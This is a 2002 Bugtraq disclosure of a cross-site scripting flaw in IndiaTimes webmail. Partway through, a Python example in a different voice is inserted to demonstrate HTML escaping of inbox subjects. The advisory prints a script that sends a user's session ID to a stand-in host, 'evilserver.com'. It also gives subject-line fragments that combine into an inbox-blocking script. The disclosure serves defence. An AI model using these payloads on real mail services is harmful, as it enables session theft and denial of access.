Bugtraq mailing list archives

IndiaTimes.com - Email - Session hijacking and Inbox Blocking


From: Giri Sandeep <sggosuch () isc iitr ernet in>
Date: Fri, 26 Apr 2002 23:38:10 +0500 (IST)

-------------------------------------------------------------------
Name      : IndiaTimes.com - Email - Session hijacking and Inbox Blocking
WebSite   : http://email.indiatimes.com
Date      : April 26, 2002
Vuln Type : Cross site scripting
Severity  : Moderate
Vendor    : Unknown

HomePage  : www.indiatimes.com
-------------------------------------------------------------------

DISCUSSION:
-------------------------------------------------------------------
Email.indiatimes.com is a very popular web-mail service provided by
www.indiatimes.com, the online edition of the newspaper 'The Times Of
India'.
The script allows a user to embed HTML, and also JavaScript, in a mail,
so it is possible to insert malicious code in a message.
Although the site does not use cookies, it is still possible to hijack
a user's session by sending him a mail, even if he never reads that
mail.

Let me put the whole discussion in dialogue form:

Q: How can a session be hijacked? The site doesn't use cookies.
A: Well, the site doesn't use cookies, but the session ID/key is contained
in
<Form name=Rform ...>
 <input type=hidden name=SID value="some_random_number">
</form>
This SID is the only token required to authenticate the user.
So an attacker may pass it to a script installed on some server, from where
he can misuse it.
Example:
<script>   
self.location.href="http://evilserver.com/evil.cgi?SID="+Rform.SID.value
</script>

Q: The user may choose not to read the attacker's mail. Then what?
A: After clicking 'Inbox', the whole list of mails appears, showing the
subject and sender's address of each mail. A <SCRIPT> embedded by the
sender in the 'Subject' is executed as soon as the user opens the
inbox.
This makes the user even more vulnerable to attack.

Q: Hey, wait a minute. Only 30 characters of a 'Subject' are
displayed. So, if one tries to insert script in the 'Subject', he can only
write 13 characters of code (30 - strlen('<SCRIPT></SCRIPT>')). It is
impossible to exploit the above vulnerability in 13 characters of code.

A: Well, it is possible. Let me show you.
One may fragment the code into smaller parts and send the fragments in
the subjects of separate mails, one after another, in the following way:

*/</script>
*/history.go(-1)/*
<script>*/

This will not allow the user to open his inbox.
Now, see the beauty of the comments and the reversed order of the lines.
The comments join the fragments into one piece of code, and since the most
recent message is at the top, the order reverses.
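As an added illustration of the fix, and not code from the advisory or from IndiaTimes (the table markup, the function names and the 30-character limit applied to raw text are my own assumptions about how such a listing might be built), the following Python renders the inbox subject column two ways: as the advisory describes it, with each subject copied straight into the page, and with each subject HTML-escaped. It takes the three subject fragments quoted above as constructed input, shows that the unescaped listing ends up containing one script element spanning three table rows, and that the escaped listing contains no script element at all. It also shows why the 30-character cut has to be applied before escaping rather than after it.

```python
import html
import re

# The advisory says the inbox listing shows only the first 30 characters of a subject.
SUBJECT_DISPLAY_LIMIT = 30

# Constructed sample input: the three subject fragments quoted in the advisory,
# listed in the order they would be sent (oldest first).
FRAGMENTS_OLDEST_FIRST = [
    "*/</script>",
    "*/history.go(-1)/*",
    "<script>*/",
]


def truncate_subject(raw_subject: str, limit: int = SUBJECT_DISPLAY_LIMIT) -> str:
    """Cut the raw subject text to the display limit before any encoding."""
    return raw_subject[:limit]


def truncate_then_escape(raw_subject: str, limit: int = SUBJECT_DISPLAY_LIMIT) -> str:
    """The correct order: truncate the raw text, then HTML-escape the result,
    so every '<', '>', '&' and quote in user data becomes an inert entity."""
    return html.escape(truncate_subject(raw_subject, limit), quote=True)


def escape_then_truncate(raw_subject: str, limit: int = SUBJECT_DISPLAY_LIMIT) -> str:
    """The wrong order, kept for contrast: the cut can land inside an entity
    and leave a dangling '&' in the page."""
    return html.escape(raw_subject, quote=True)[:limit]


def render_inbox_unsafe(subjects_oldest_first):
    """Listing as the advisory describes it: newest message on top and the
    subject text written into the page without escaping (assumed markup)."""
    rows = [
        f"<tr><td>{truncate_subject(s)}</td></tr>"
        for s in reversed(subjects_oldest_first)
    ]
    return "<table>\n" + "\n".join(rows) + "\n</table>"


def render_inbox_safe(subjects_oldest_first):
    """Same listing with the fix applied to every subject cell."""
    rows = [
        f"<tr><td>{truncate_then_escape(s)}</td></tr>"
        for s in reversed(subjects_oldest_first)
    ]
    return "<table>\n" + "\n".join(rows) + "\n</table>"


# Matches a script element even when its opening and closing tags sit in
# different table rows, which is exactly how the fragmented subjects combine.
SCRIPT_BLOCK = re.compile(r"<script\b[^>]*>(.*?)</script\s*>", re.IGNORECASE | re.DOTALL)


def script_blocks(rendered_html: str):
    """Return the body of every <script>...</script> element in the page."""
    return SCRIPT_BLOCK.findall(rendered_html)


if __name__ == "__main__":
    unsafe = render_inbox_unsafe(FRAGMENTS_OLDEST_FIRST)
    safe = render_inbox_safe(FRAGMENTS_OLDEST_FIRST)
    print("script elements in unescaped listing:", len(script_blocks(unsafe)))
    print("script elements in escaped listing:  ", len(script_blocks(safe)))
    print(safe)
```

The regex scan is only a demonstration aid; the defence is the escaping in `truncate_then_escape`, which must be applied to every field that comes from a message (sender address included, since the listing shows that too). Truncating after escaping is a real pitfall: a 30-character subject whose last character is `<` becomes `&lt;` on escaping, and cutting that back to 30 characters leaves a bare `&` in the page.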

Q: The user may disable JavaScript in the browser's settings.
A: Then the whole site stops working.


IMPACT:
---------------------------------------------------------------------
Because of the high number of users of Email.indiatimes.com, this
vulnerability poses a great risk.

SOLUTION:
--------------------------------------------------------------------- 
The vendor was notified but there has been no response so far.

Users may choose to use the Lynx (text-only) version of Email.indiatimes.com.


DISCLAIMER:
---------------------------------------------------------------------
The information within this document may change
without notice. Use of this information constitutes
acceptance for use in an AS IS condition. There are NO
warranties with regard to this information. In no
event shall the author be liable for any consequences
whatsoever arising out of or in connection with the
use or spread of this information. Any use of this
information lays within the user's responsibility.


FEEDBACK:
---------------------------------------------------------------------
In case of any queries, please don't hesitate to drop me a mail.



Thanks,

*************************|<<---/\--->>|***********************************
Sandeep Giri                  |
System Administrator(Intranet)| For finding anything you need two things:
Indian Institute of Technology|       1. Will 
Roorkee-247667                |       2. Google 
India                         |         
*************************|<<---\/--->>|***********************************



